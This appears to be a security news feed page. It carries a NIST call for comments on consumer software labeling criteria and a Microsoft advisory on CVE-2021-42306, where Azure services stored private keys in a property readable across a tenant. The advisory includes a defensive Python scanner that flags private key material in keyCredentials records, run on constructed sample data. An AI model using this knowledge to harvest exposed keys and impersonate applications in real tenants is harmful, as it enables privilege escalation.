Section 4 of the President's Executive Order (EO) on "Improving the Nation's Cybersecurity (14028)," issued on May 12, 2021, charges NIST, in coordination with the Federal Trade Commission (FTC) and other agencies, to initiate pilot programs for cybersecurity labeling. These labeling programs are intended to educate the public on the security capabilities of software development practices.

To inform this effort, Sec. 4(u) of the EO directs NIST to "…identify secure software development practices or criteria for a consumer software labeling program." Furthermore, the identified criteria "…shall reflect a baseline level of security practices, and if practicable, shall reflect increasingly comprehensive levels of testing and assessment that a product may have undergone." Sec. 4(u) also states that "...NIST shall examine all relevant information, labeling, and incentive programs, employ best practices, and identify, modify, or develop a recommended label or, if practicable, a tiered software security rating system. This review shall focus on ease of use for consumers and a determination of what measures can be taken to maximize participation."

Today, NIST has released for public comment a document that advances these tasks: Draft Baseline Criteria for Consumer Software Cybersecurity Labeling. This draft document addresses the need to develop appropriate cybersecurity criteria for consumer software—and it informs the development and use of a label for consumer software which will improve consumers’ awareness, information, and ability to make purchasing decisions (while taking cybersecurity considerations into account). This document was developed after much input from a recent NIST workshop, position papers submitted to NIST, additional extensive research, and many discussions with experts and organizations from the public and private sectors.

We are seeking comments on all aspects of the criteria contained in the draft document (more details can be found in the ‘note to reviewers’ section of the draft document). In accordance with the EO, NIST plans to produce a final version of these criteria by February 6, 2022.

Please view the draft document HERE.

To submit comments, please email them to labeling-eo@nist.gov using the subject, "Draft Consumer Software Labeling Criteria," by December 16, 2021.


Thu, 18 Nov 2021 13:56:00 +0000

Azure Active Directory (AD) keyCredential property Information Disclosure

 Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.
The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.
Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.
Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.
As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.
As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services via Azure Service Health Notifications, providing remediation guidance specific to the services they use.

Product/Service: Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created.
Microsoft's Mitigation: Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action.
Customer impact assessment and remediation: Automation Run-As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately, customers who bring their own certificates could be affected, regardless of the renewal date of the certificate.
To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo.
In addition, Azure Automation supports Managed Identities (GA announced in October 2021). Migrating from Run-As accounts to Managed Identities will mitigate this issue. Please follow the guidance here to migrate.

Product/Service: Azure Migrate creates Azure AD applications to enable Azure Migrate appliances to communicate with the service's endpoints.
Microsoft's Mitigation: Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications.
Customer impact assessment and remediation: Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action. Azure Migrate appliances registered prior to 11/02/2021, and/or appliances registered after 11/02/2021 where auto-update was disabled, could be affected by this issue.
To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.

Product/Service: Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints.
Microsoft's Mitigation: Azure Site Recovery deployed an update to prevent private key data from being uploaded to Azure AD applications. Customers using Azure Site Recovery's preview experience "VMware to Azure Disaster Recovery" after 11/01/2021 are not impacted and do not require further action.
Customer impact assessment and remediation: Customers who have deployed and registered the preview version of the VMware to Azure DR experience with ASR before 11/01/2021 could be affected.
To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link.

Product/Service: Azure AD applications and Service Principals [1]
Microsoft's Mitigation: Microsoft has blocked reading private key data as of 10/30/2021.
Customer impact assessment and remediation: Follow the guidance available at aad-app-credential-remediation-guide to assess whether your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.
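The assessment step in the last table row, and the description of the keyCredentials property above, come down to one question: does a stored key value actually contain an X.509 certificate, or something else (a PKCS#12 PFX, a PKCS#8 or PKCS#1 private key, a PEM-encoded private key)? The following is an added example, not Microsoft's remediation script, that answers it with a minimal DER tag/length reader over a constructed list of keyCredentials entries shaped like Microsoft Graph records. It relies on how the standard structures begin: a DER Certificate opens with a nested SEQUENCE (tbsCertificate), a PFX opens with INTEGER version 3, and PKCS#8/PKCS#1 private keys open with INTEGER version 0. The sample blobs, keyIds and display names are constructed for the example; in a real tenant the `key` values would come from Graph, and since 10/30/2021 Azure AD no longer returns clear text private key data, so this check is most useful on exported backups, deployment artifacts or other copies of application metadata.

```python
import base64
from typing import Optional, Tuple

# --- tiny DER helpers (used only to build the constructed samples) ---

def _der_len(n: int) -> bytes:
    """DER length encoding (short and long form)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der_seq(*children: bytes) -> bytes:
    body = b"".join(children)
    return b"\x30" + _der_len(len(body)) + body

def der_int(value: int) -> bytes:
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    return b"\x02" + _der_len(len(body)) + body

def b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")

# --- classifier ---

def read_tlv(buf: bytes, offset: int = 0) -> Optional[Tuple[int, int, int]]:
    """Return (tag, length, value_offset) for the DER TLV at offset, or None if malformed."""
    if offset + 2 > len(buf):
        return None
    tag, first, pos = buf[offset], buf[offset + 1], offset + 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F            # long form: n length bytes follow
        if n == 0 or pos + n > len(buf):
            return None             # indefinite length is not DER
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        return None
    return tag, length, pos

def classify_key(key_b64: str) -> str:
    """Heuristic classification of a base64 keyCredentials 'key' value."""
    if not key_b64:
        return "no-key-data"        # Graph often returns null for 'key' on reads
    try:
        raw = base64.b64decode(key_b64, validate=True)
    except ValueError:              # binascii.Error is a ValueError subclass
        return "undecodable"
    text = raw.decode("ascii", errors="ignore")
    if "-----BEGIN " in text:       # PEM armour stored instead of raw DER
        if "PRIVATE KEY-----" in text:
            return "pem-private-key"
        if "-----BEGIN CERTIFICATE-----" in text:
            return "pem-certificate"
        return "pem-other"
    outer = read_tlv(raw)
    if outer is None or outer[0] != 0x30:
        return "not-der"
    inner = read_tlv(raw, outer[2])
    if inner is None:
        return "not-der"
    tag, length, pos = inner
    if tag == 0x30:
        return "x509-certificate"   # Certificate ::= SEQUENCE { tbsCertificate SEQUENCE, ... }
    if tag == 0x02:
        version = int.from_bytes(raw[pos:pos + length], "big")
        if version == 3:
            return "pkcs12-pfx"     # PFX ::= SEQUENCE { version INTEGER (v3), authSafe, ... }
        return "private-key-info"   # PKCS#8 PrivateKeyInfo / PKCS#1 RSAPrivateKey: version 0
    return "unknown-der"

PRIVATE_MATERIAL = {"pem-private-key", "pkcs12-pfx", "private-key-info"}

def audit_key_credentials(credentials: list) -> list:
    """Flag every keyCredentials entry whose key value carries private key material."""
    findings = []
    for cred in credentials:
        kind = classify_key(cred.get("key") or "")
        findings.append({
            "keyId": cred.get("keyId"),
            "displayName": cred.get("displayName"),
            "classification": kind,
            "flagged": kind in PRIVATE_MATERIAL,
        })
    return findings

# --- constructed sample data (not real keys or tenant objects) ---
CERT_BLOB = der_seq(der_seq(der_int(12345), der_seq()), der_seq(), b"\x03\x02\x00\xff")
PFX_BLOB = der_seq(der_int(3), der_seq(b"\x06\x01\x00"))
PRIVATE_KEY_BLOB = der_seq(der_int(0), der_seq(b"\x06\x01\x00"), b"\x04\x02\x00\x00")
PEM_KEY = b"-----BEGIN RSA PRIVATE KEY-----\nMIIB...\n-----END RSA PRIVATE KEY-----\n"

SAMPLE_KEY_CREDENTIALS = [
    {"keyId": "00000000-0000-0000-0000-000000000001", "displayName": "CN=example-runas",
     "type": "AsymmetricX509Cert", "usage": "Verify", "key": b64(CERT_BLOB)},
    {"keyId": "00000000-0000-0000-0000-000000000002", "displayName": "CN=example-runas",
     "type": "AsymmetricX509Cert", "usage": "Verify", "key": b64(PFX_BLOB)},
    {"keyId": "00000000-0000-0000-0000-000000000003", "displayName": "CN=example-migrate",
     "type": "AsymmetricX509Cert", "usage": "Verify", "key": b64(PEM_KEY)},
    {"keyId": "00000000-0000-0000-0000-000000000004", "displayName": "CN=example-asr",
     "type": "AsymmetricX509Cert", "usage": "Verify", "key": b64(PRIVATE_KEY_BLOB)},
]

if __name__ == "__main__":
    for f in audit_key_credentials(SAMPLE_KEY_CREDENTIALS):
        print(("FLAG " if f["flagged"] else "ok   ") + f"{f['keyId']} {f['classification']}")
```

A `flagged` entry is the condition the advisory describes: private key material sitting in a property readable by anyone with application-metadata read access, so that credential should be rotated per the remediation guide. The classifier is deliberately a prefix heuristic (a DER CRL, for instance, also opens with a nested SEQUENCE); for a definitive answer, hand anything that is not clearly a certificate to a full ASN.1 parser.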

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.


Thu, 18 Nov 2021 13:53:00 +0000